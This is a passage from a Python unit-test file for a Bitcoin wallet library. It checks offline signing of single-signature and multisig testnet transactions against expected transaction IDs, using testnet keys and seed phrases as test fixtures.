self.assertTrue(tx.is_segwit())
self.assertEqual('f8039bd85279f2b5698f15d47f2e338d067d09af391bd8a19467aa94d03f280c', tx.txid())
self.assertEqual('3b7cc3c3352bbb43ddc086487ac696e09f2863c3d9e8636721851b8008a83ffa', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_addr_p2pkh(self, mock_write): # compressed pubkey
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/44'/1'/0'
keystore.from_xprv('tprv8gfKwjuAaqtHgqxMh1tosAQ28XvBMkcY5NeFRA3pZMpz6MR4H4YZ3MJM4fvNPnRKeXR1Td2vQGgjorNXfo94WvT5CYDsPAqjHxSn436G1Eu'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('mg2jk6S5WGDhUPA8mLSxDLWpUoQnX1zzoG')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual('e56da664631b8c666c6df38ec80c954c4ac3c4f56f040faf0070e4681e937fc4', tx.txid())
self.assertEqual('e56da664631b8c666c6df38ec80c954c4ac3c4f56f040faf0070e4681e937fc4', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_addr_p2wpkh_p2sh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/49'/1'/0'
keystore.from_xprv('uprv8zHHrMQMQ26utWwNJ5MK2SXpB9hbmy7pbPaneii69xT8cZTyFpxQFxkknGWKP8dxBTZhzy7yP6cCnLrRCQjzJDk3G61SjZpxhFQuB2NR8a5'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('2NA2JbUVK7HGWUCK5RXSVNHrkgUYF8d9zV8')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('7642816d051aa3b333b6564bb6e44fe3a5885bfe7db9860dfbc9973a5c9a6562', tx.txid())
self.assertEqual('9bb9949974954613945756c48ca5525cd5cba1b667ccb10c7a53e1ed076a1117', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_addr_p2wpkh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/84'/1'/0'
keystore.from_xprv('vprv9K9hbuA23Bidgj1KRSHUZMa59jJLeZBpXPVn4RP7sBLArNhZxJjw4AX7aQmVTErDt4YFC11ptMLjbwxgrsH8GLQ1cx77KggWeVPeDBjr9xM'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('tb1qm2eh4787lwanrzr6pf0ekf5c7jnmghm2y9k529')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('f8039bd85279f2b5698f15d47f2e338d067d09af391bd8a19467aa94d03f280c', tx.txid())
self.assertEqual('3b7cc3c3352bbb43ddc086487ac696e09f2863c3d9e8636721851b8008a83ffa', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_hd_multisig_online_addr_p2sh(self, mock_write):
# 2-of-3 legacy p2sh multisig
wallet_offline1 = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('blast uniform dragon fiscal ensure vast young utility dinosaur abandon rookie sure', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YTPEgwk4zzr8wyo7pXGmbbVUnfYNtx6SgAMF5q3LN3Kch58P9hxGNsTmP7Dn49nnrmpE6upoRb1Xojg12FGLuLHkVpVtS44'),
keystore.from_xpub('tpubD6NzVbkrYhZ4XJzYkhsCbDCcZRmDAKSD7bXi9mdCni7acVt45fxbTVZyU6jRGh29ULKTjoapkfFsSJvQHitcVKbQgzgkkYsAmaovcro7Mhf')
],
'2of3', gap_limit=2
)
wallet_offline2 = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('cycle rocket west magnet parrot shuffle foot correct salt library feed song', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YTPEgwk4zzr8wyo7pXGmbbVUnfYNtx6SgAMF5q3LN3Kch58P9hxGNsTmP7Dn49nnrmpE6upoRb1Xojg12FGLuLHkVpVtS44'),
keystore.from_xpub('tpubD6NzVbkrYhZ4YARFMEZPckrqJkw59GZD1PXtQnw14ukvWDofR7Z1HMeSCxfYEZVvg4VdZ8zGok5VxHwdrLqew5cMdQntWc5mT7mh1CSgrnX')
],
'2of3', gap_limit=2
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('2N4z38eTKcWTZnfugCCfRyXtXWMLnn8HDfw')
# bootstrap wallet_online
funding_tx = Transaction('010000000001016207d958dc46508d706e4cd7d3bc46c5c2b02160e2578e5fad2efafc3927050301000000171600147a4fc8cdc1c2cf7abbcd88ef6d880e59269797acfdffffff02809698000000000017a91480c2353f6a7bc3c71e99e062655b19adb3dd2e48870d0916020000000017a914703f83ef20f3a52d908475dcad00c5144164d5a2870247304402203b1a5cb48cadeee14fa6c7bbf2bc581ca63104762ec5c37c703df778884cc5b702203233fa53a2a0bfbd85617c636e415da72214e359282cce409019319d031766c50121021112c01a48cc7ea13cba70493c6bffebb3e805df10ff4611d2bf559d26e25c04bf391400')
funding_txid = funding_tx.txid()
self.assertEqual('c59913a1fa9b1ef1f6928f0db490be67eeb9d7cb05aa565ee647e859642f3532', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2MuCQQHJNnrXzQzuqfUCfAwAjPqpyEHbgue', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325503
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx - first
tx = wallet_offline1.sign_transaction(tx_copy, password=None)
self.assertFalse(tx.is_complete())
tx = Transaction(tx.serialize())
# sign tx - second
tx = wallet_offline2.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
tx = Transaction(tx.serialize())
self.assertEqual('010000000132352f6459e847e65e56aa05cbd7b9ee67be90b40d8f92f6f11e9bfaa11399c500000000fdfe0000483045022100cfe41e783629a2ad0b1f17cd2dbd69db05763fa7a22691131fa321ba3140d7cb02203fbda2ccc6212315464cd814d4e909b4f80a2361e3af0f9deda06478f91a0f3901483045022100b84fd63e957f2409558f63962fc91ba58334efde8b88ff53ca71da3d0fe7219702206001c6caeb30e18a7525fc72de0003e12646bf815b12fb132c1aadd6ffa1989c014c69522102afb4af9a91264e1c6dce3ebe5312801723270ac0ba8134b7b49129328fcb0f2821030b482838721a38d94847699fed8818b5c5f56500ef72f13489e365b65e5749cf2103e5db7969ae2f2576e6a061bf3bb2db16571e77ffb41e0b27170734359235cbce53aefdffffff02a02526000000000017a9141567b2578f300fa618ef0033611fd67087aff6d187585d72000000000017a91480c2353f6a7bc3c71e99e062655b19adb3dd2e4887bf391400',
str(tx))
self.assertEqual('bb4c28af28b970522c56ff0482cd98c2b78a90bec578bcede8a9e5cbec6ef5e7', tx.txid())
self.assertEqual('bb4c28af28b970522c56ff0482cd98c2b78a90bec578bcede8a9e5cbec6ef5e7', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_hd_multisig_online_addr_p2wsh_p2sh(self, mock_write):
# 2-of-2 p2sh-embedded segwit multisig
wallet_offline1 = WalletIntegrityHelper.create_multisig_wallet(
[
# bip39: finish seminar arrange erosion sunny coil insane together pretty lunch lunch rose, der: m/1234'/1'/0', p2wsh-p2sh multisig
keystore.from_xprv('Uprv9CvELvByqm8k2dpecJVjgLMX1z5DufEjY4fBC5YvdGF5WjGCa7GVJJ2fYni1tyuF7Hw83E6W2ZBjAhaFLZv2ri3rEsubkCd5avg4EHKoDBN'),
keystore.from_xpub('Upub5Qb8ik4Cnu8g97KLXKgVXHqY6tH8emQvqtBncjSKsyfTZuorPtTZgX7ovKKZHuuVGBVd1MTTBkWez1XXt2weN1sWBz6SfgRPQYEkNgz81QF')
],
'2of2', gap_limit=2
)
wallet_offline2 = WalletIntegrityHelper.create_multisig_wallet(
[
# bip39: square page wood spy oil story rebel give milk screen slide shuffle, der: m/1234'/1'/0', p2wsh-p2sh multisig
keystore.from_xprv('Uprv9BbnKEXJxXaNvdEsRJ9VA9toYrSeFJh5UfGBpM2iKe8Uh7UhrM9K8ioL53s8gvCoGfirHHaqpABDAE7VUNw8LNU1DMJKVoWyeNKu9XcDC19'),
keystore.from_xpub('Upub5RuakRisg8h3F7u7iL2k3UJFa1uiK7xauHamzTxYBbn4PXbM7eajr6M9Q2VCr6cVGhfhqWQqxnABvtSATuVM1xzxk4nA189jJwzaMn1QX7V')
],
'2of2', gap_limit=2
)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('2MsHQRm1pNi6VsmXYRxYMcCTdPu7Xa1RyFe')
# bootstrap wallet_online
funding_tx = Transaction('0100000000010118d494d28e5c3bf61566ca0313e22c3b561b888a317d689cc8b47b947adebd440000000017160014aec84704ea8508ddb94a3c6e53f0992d33a2a529fdffffff020f0925000000000017a91409f7aae0265787a02de22839d41e9c927768230287809698000000000017a91400698bd11c38f887f17c99846d9be96321fbf989870247304402206b906369f4075ebcfc149f7429dcfc34e11e1b7bbfc85d1185d5e9c324be0d3702203ce7fc12fd3131920fbcbb733250f05dbf7d03e18a4656232ee69d5c54dd46bd0121028a4b697a37f3f57f6e53f90db077fa9696095b277454fda839c211d640d48649c0391400')
funding_txid = funding_tx.txid()
self.assertEqual('54356de9e156b85c8516fd4d51bdb68b5513f58b4a6147483978ae254627ee3e', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2N8CtJRwxb2GCaiWWdSHLZHHLoZy53CCyxf', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325504
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx - first
tx = wallet_offline1.sign_transaction(tx_copy, password=None)
self.assertFalse(tx.is_complete())
self.assertEqual('6a58a51591142429203b62b6ddf6b799a6926882efac229998c51bee6c3573eb', tx.txid())
tx = Transaction(tx.serialize())
# sign tx - second
tx = wallet_offline2.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
tx = Transaction(tx.serialize())
self.assertEqual('010000000001013eee274625ae78394847614a8bf513558bb6bd514dfd16855cb856e1e96d355401000000232200206ee8d4bb1277b7dbe1d4e49b880993aa993f417a9101cb23865c7c7258732704fdffffff02a02526000000000017a914a4189ef02c95cfe36f8e880c6cb54dff0837b22687585d72000000000017a91400698bd11c38f887f17c99846d9be96321fbf98987040047304402205a9dd9eb5676196893fb08f60079a2e9f567ee39614075d8c5d9fab0f11cbbc7022039640855188ebb7bccd9e3f00b397a888766d42d00d006f1ca7457c15449285f014730440220234f6648c5741eb195f0f4cd645298a10ce02f6ef557d05df93331e21c4f58cb022058ce2af0de1c238c4a8dd3b3c7a9a0da6e381ddad7593cddfc0480f9fe5baadf0147522102975c00f6af579f9a1d283f1e5a43032deadbab2308aef30fb307c0cfe54777462102d3f47041b424a84898e315cc8ef58190f6aec79c178c12de0790890ba7166e9c52aec0391400',
str(tx))
self.assertEqual('6a58a51591142429203b62b6ddf6b799a6926882efac229998c51bee6c3573eb', tx.txid())
self.assertEqual('96d0bca1001778c54e4c3a07929fab5562c5b5a23fd1ca3aa3870cc5df2bf97d', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_hd_multisig_online_addr_p2wsh(self, mock_write):
# 2-of-3 p2wsh multisig
wallet_offline1 = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('bitter grass shiver impose acquire brush forget axis eager alone wine silver', '', True),
keystore.from_xpub('Vpub5fcdcgEwTJmbmqAktuK8Kyq92fMf7sWkcP6oqAii2tG47dNbfkGEGUbfS9NuZaRywLkHE6EmUksrqo32ZL3ouLN1HTar6oRiHpDzKMAF1tf'),
keystore.from_xpub('Vpub5fjkKyYnvSS4wBuakWTkNvZDaBM2vQ1MeXWq368VJHNr2eT8efqhpmZ6UUkb7s2dwCXv2Vuggjdhk4vZVyiAQTwUftvff73XcUGq2NQmWra')
],
'2of3', gap_limit=2
)
wallet_offline2 = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('snow nest raise royal more walk demise rotate smooth spirit canyon gun', '', True),
keystore.from_xpub('Vpub5fjkKyYnvSS4wBuakWTkNvZDaBM2vQ1MeXWq368VJHNr2eT8efqhpmZ6UUkb7s2dwCXv2Vuggjdhk4vZVyiAQTwUftvff73XcUGq2NQmWra'),
keystore.from_xpub('Vpub5gSKXzxK7FeKQedu2q1z9oJWxqvX72AArW3HSWpEhc8othDH8xMDu28gr7gf17sp492BuJod8Tn7anjvJrKpETwqnQqX7CS8fcYyUtedEMk')
],
'2of3', gap_limit=2
)
# ^ third seed: hedgehog sunset update estate number jungle amount piano friend donate upper wool
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('tb1q83p6eqxkuvq4eumcha46crpzg4nj84s9p0hnynkxg8nhvfzqcc7q4erju6')
# bootstrap wallet_online
funding_tx = Transaction('0100000000010132352f6459e847e65e56aa05cbd7b9ee67be90b40d8f92f6f11e9bfaa11399c501000000171600142e5d579693b2a7679622935df94d9f3c84909b24fdffffff0280969800000000002200203c43ac80d6e3015cf378bf6bac0c22456723d6050bef324ec641e7762440c63c83717d010000000017a91441b772909ad301b41b76f4a3c5058888a7fe6f9a8702483045022100de54689f74b8efcce7fdc91e40761084686003bcd56c886ee97e75a7e803526102204dea51ae5e7d01bd56a8c336c64841f7fe02a8b101fa892e13f2d079bb14e6bf012102024e2f73d632c49f4b821ccd3b6da66b155427b1e5b1c4688cefd5a4b4bfa404c1391400')
funding_txid = funding_tx.txid()
self.assertEqual('643a7ab9083d0227dd9df314ce56b18d279e6018ff975079dfaab82cd7a66fa3', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2MyoZVy8T1t94yLmyKu8DP1SmbWvnxbkwRA', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325505
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx - first
tx = wallet_offline1.sign_transaction(tx_copy, password=None)
self.assertFalse(tx.is_complete())
self.assertEqual('32e946761b4e718c1fa8d044db9e72d5831f6395eb284faf2fb5c4af0743e501', tx.txid())
tx = Transaction(tx.serialize())
# sign tx - second
tx = wallet_offline2.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
tx = Transaction(tx.serialize())
self.assertEqual('01000000000101a36fa6d72cb8aadf795097ff18609e278db156ce14f39ddd27023d08b97a3a640000000000fdffffff02a02526000000000017a91447ee5a659f6ffb53f7e3afc1681b6415f3c00fa187585d7200000000002200203c43ac80d6e3015cf378bf6bac0c22456723d6050bef324ec641e7762440c63c04004730440220629d89626585f563202e6b38ceddc26ccd00737e0b7ee4239b9266ef9174ea2f02200b74828399a2e35ed46c9b484af4817438d5fea890606ebb201b821944db1fdc0147304402205d1a59c84c419992069e9764a7992abca6a812cc5dfd4f0d6515d4283e660ce802202597a38899f31545aaf305629bd488f36bf54e4a05fe983932cafbb3906efb8f016952210223f815ab09f6bfc8519165c5232947ae89d9d43d678fb3486f3b28382a2371fa210273c529c2c9a99592f2066cebc2172a48991af2b471cb726b9df78c6497ce984e2102aa8fc578b445a1e4257be6b978fcece92980def98dce0e1eb89e7364635ae94153aec1391400',
str(tx))
self.assertEqual('32e946761b4e718c1fa8d044db9e72d5831f6395eb284faf2fb5c4af0743e501', tx.txid())
self.assertEqual('4376fa5f1f6cb37b1f3956175d3bd4ef6882169294802b250a3c672f3ff431c1', tx.wtxid())
class TestWalletHistory_SimpleRandomOrder(TestCaseForTestnet):
transactions = {
"0f4972c84974b908a58dda2614b68cf037e6c03e8291898c719766f213217b67": "01000000029d1bdbe67f0bd0d7bd700463f5c29302057c7b52d47de9e2ca5069761e139da2000000008b483045022100a146a2078a318c1266e42265a369a8eef8993750cb3faa8dd80754d8d541d5d202207a6ab8864986919fd1a7fd5854f1e18a8a0431df924d7a878ec3dc283e3d75340141045f7ba332df2a7b4f5d13f246e307c9174cfa9b8b05f3b83410a3c23ef8958d610be285963d67c7bc1feb082f168fa9877c25999963ff8b56b242a852b23e25edfeffffff9d1bdbe67f0bd0d7bd700463f5c29302057c7b52d47de9e2ca5069761e139da2010000008a47304402201c7fa37b74a915668b0244c01f14a9756bbbec1031fb69390bcba236148ab37e02206151581f9aa0e6758b503064c1e661a726d75c6be3364a5a121a8c12cf618f64014104dc28da82e141416aaf771eb78128d00a55fdcbd13622afcbb7a3b911e58baa6a99841bfb7b99bcb7e1d47904fda5d13fdf9675cdbbe73e44efcc08165f49bac6feffffff02b0183101000000001976a914ca14915184a2662b5d1505ce7142c8ca066c70e288ac005a6202000000001976a9145eb4eeaefcf9a709f8671444933243fbd05366a388ac54c51200",
"2791cdc98570cc2b6d9d5b197dc2d002221b074101e3becb19fab4b79150446d": "010000000132201ff125888a326635a2fc6e971cd774c4d0c1a757d742d0f6b5b020f7203a050000006a47304402201d20bb5629a35b84ff9dd54788b98e265623022894f12152ac0e6158042550fe02204e98969e1f7043261912dd0660d3da64e15acf5435577fc02a00eccfe76b323f012103a336ad86546ab66b6184238fe63bb2955314be118b32fa45dd6bd9c4c5875167fdffffff0254959800000000001976a9148d2db0eb25b691829a47503006370070bc67400588ac80969800000000001976a914f96669095e6df76cfdf5c7e49a1909f002e123d088ace8ca1200",
"2d216451b20b6501e927d85244bcc1c7c70598332717df91bb571359c358affd": "010000000001036cdf8d2226c57d7cc8485636d8e823c14790d5f24e6cf38ba9323babc7f6db2901000000171600143fc0dbdc2f939c322aed5a9c3544468ec17f5c3efdffffff507dce91b2a8731636e058ccf252f02b5599489b624e003435a29b9862ccc38c0200000017160014c50ff91aa2a790b99aa98af039ae1b156e053375fdffffff6254162cf8ace3ddfb3ec242b8eade155fa91412c5bde7f55decfac5793743c1010000008b483045022100de9599dcd7764ca8d4fcbe39230602e130db296c310d4abb7f7ae4d139c4d46402200fbfd8e6dc94d90afa05b0c0eab3b84feb465754db3f984fbf059447282771c30141045eecefd39fabba7b0098c3d9e85794e652bdbf094f3f85a3de97a249b98b9948857ea1e8209ee4f196a6bbcfbad103a38698ee58766321ba1cdee0cbfb60e7b2fdffffff01e85af70100000000160014e8d29f07cd5f813317bec4defbef337942d85d74024730440220218049aee7bbd34a7fa17f972a8d24a0469b0131d943ef3e30860401eaa2247402203495973f006e6ee6ae74a83228623029f238f37390ee4b587d95cdb1d1aaee9901210392ba263f3a2b260826943ff0df25e9ca4ef603b98b0a916242c947ae0626575f02473044022002603e5ceabb4406d11aedc0cccbf654dd391ce68b6b2228a40e51cf8129310d0220533743120d93be8b6c1453973935b911b0a2322e74708d23e8b5f90e74b0f192012103221b4ee0f508ba595fc1b9c2252ed9d03e99c73b97344dae93263c68834f034800ed161300",
"31494e7e9f42f4bd736769b07cc602e2a1019617b2c72a03ec945b667aada78f": "0100000000010454022b1b4d3b45e7fcac468de2d6df890a9f41050c05d80e68d4b083f728e76a000000008b483045022100ea8fe74db2aba23ad36ac66aaa481bad2b4d1b3c331869c1d60a28ce8cfad43c02206fa817281b33fbf74a6dd7352bdc5aa1d6d7966118a4ad5b7e153f37205f1ae80141045f7ba332df2a7b4f5d13f246e307c9174cfa9b8b05f3b83410a3c23ef8958d610be285963d67c7bc1feb082f168fa9877c25999963ff8b56b242a852b23e25edfdffffff54022b1b4d3b45e7fcac468de2d6df890a9f41050c05d80e68d4b083f728e76a01000000171600146dfe07e12af3db7c715bf1c455f8517e19c361e7fdffffff54022b1b4d3b45e7fcac468de2d6df890a9f41050c05d80e68d4b083f728e76a020000006a47304402200b1fb89e9a772a8519294acd61a53a29473ce76077165447f49a686f1718db5902207466e2e8290f84114dc9d6c56419cb79a138f03d7af8756de02c810f19e4e03301210222bfebe09c2638cfa5aa8223fb422fe636ba9675c5e2f53c27a5d10514f49051fdffffff54022b1b4d3b45e7fcac468de2d6df890a9f41050c05d80e68d4b083f728e76a0300000000fdffffff018793140d000000001600144b3e27ddf4fc5f367421ee193da5332ef351b700000247304402207ba52959938a3853bcfd942d8a7e6a181349069cde3ea73dbde43fa9669b8d5302207a686b92073863203305cb5d5550d88bdab0d21b9e9761ba4a106ea3970e08d901210265c1e014112ed19c9f754143fb6a2ff89f8630d62b33eb5ae708c9ea576e61b50002473044022029e868a905aa3ecae6eafcbd5959aefff0e5f39c1fc7a131a174828806e74e5202202f0aaa7c3cb3d9a9d526e5428ce37c0f0af0d774aa30b09ded8bc2230e7ffaf2012102fe0104455dc52b1689bba130664e452642180eb865217acfc6997260b7d946ae22c71200",
"336eee749da7d1c537fd5679157fae63005bfd4bb8cf47ae73600999cbc9beaa": "0100000000010232201ff125888a326635a2fc6e971cd774c4d0c1a757d742d0f6b5b020f7203a020000006a4730440220198c0ba2b2aefa78d8cca01401d408ecdebea5ac05affce36f079f6e5c8405ca02200eabb1b9a01ff62180cf061dfacedba6b2e07355841b9308de2d37d83489c7b80121031c663e5534fe2a6de816aded6bb9afca09b9e540695c23301f772acb29c64a05fdfffffffb28ff16811d3027a2405be68154be8fdaff77284dbce7a2314c4107c2c941600000000000fdffffff015e104f01000000001976a9146dfd56a0b5d0c9450d590ad21598ecfeaa438bd788ac000247304402207d6dc521e3a4577685535f098e5bac4601aa03658b924f30bf7afef1850e437e022045b76771d8b6ca1939352d6b759fca31029e5b2edffa44dc747fe49770e746cd012102c7f36d4ceed353b90594ebaf3907972b6d73289bdf4707e120de31ec4e1eb11679f31200",
"3a6ed17d34c49dfdf413398e113cf5f71710d59e9f4050bbc601d513a77eb308": "010000000168091e76227e99b098ef8d6d5f7c1bb2a154dd49103b93d7b8d7408d49f07be0000000008a47304402202f683a63af571f405825066bd971945a35e7142a75c9a5255d364b25b7115d5602206c59a7214ae729a519757e45fdc87061d357813217848cf94df74125221267ac014104aecb9d427e10f0c370c32210fe75b6e72ccc4f415076cf1a6318fbed5537388862c914b29269751ab3a04962df06d96f5f4f54e393a0afcbfa44b590385ae61afdffffff0240420f00000000001976a9145f917fd451ca6448978ebb2734d2798274daf00b88aca8063d00000000001976a914e1232622a96a04f5e5a24ca0792bb9c28b089d6e88ace9ca1200",
"475c149be20c8a73596fad6cb8861a5af46d4fcf8e26a9dbf6cedff7ff80b70d": "01000000013a7e6f19a963adc7437d2f3eb0936f1fc9ef4ba7e083e19802eb1111525a59c2000000008b483045022100958d3931051306489d48fe69b32561e0a16e82a2447c07be9d1069317084b5e502202f70c2d9be8248276d334d07f08f934ffeea83977ad241f9c2de954a2d577f94014104d950039cec15ad10ad4fb658873bc746148bc861323959e0c84bf10f8633104aa90b64ce9f80916ab0a4238e025dcddf885b9a2dd6e901fe043a433731db8ab4fdffffff02a086010000000000160014bbfab2cc3267cea2df1b68c392cb3f0294978ca922940d00000000001976a914760f657c67273a06cad5b1d757a95f4ed79f5a4b88ac4c8d1300",
"56a65810186f82132cea35357819499468e4e376fca685c023700c75dc3bd216": "01000000000101614b142aeeb827d35d2b77a5b11f16655b6776110ddd9f34424ff49d85706cf90200000000fdffffff02784a4c00000000001600148464f47f35cbcda2e4e5968c5a3a862c43df65a1404b4c00000000001976a914c9efecf0ecba8b42dce0ae2b28e3ea0573d351c988ac0247304402207d8e559ed1f56cb2d02c4cb6c95b95c470f4b3cb3ce97696c3a58e39e55cd9b2022005c9c6f66a7154032a0bb2edc1af1f6c8f488bec52b6581a3a780312fb55681b0121024f83b87ac3440e9b30cec707b7e1461ecc411c2f45520b45a644655528b0a68ae9ca1200",
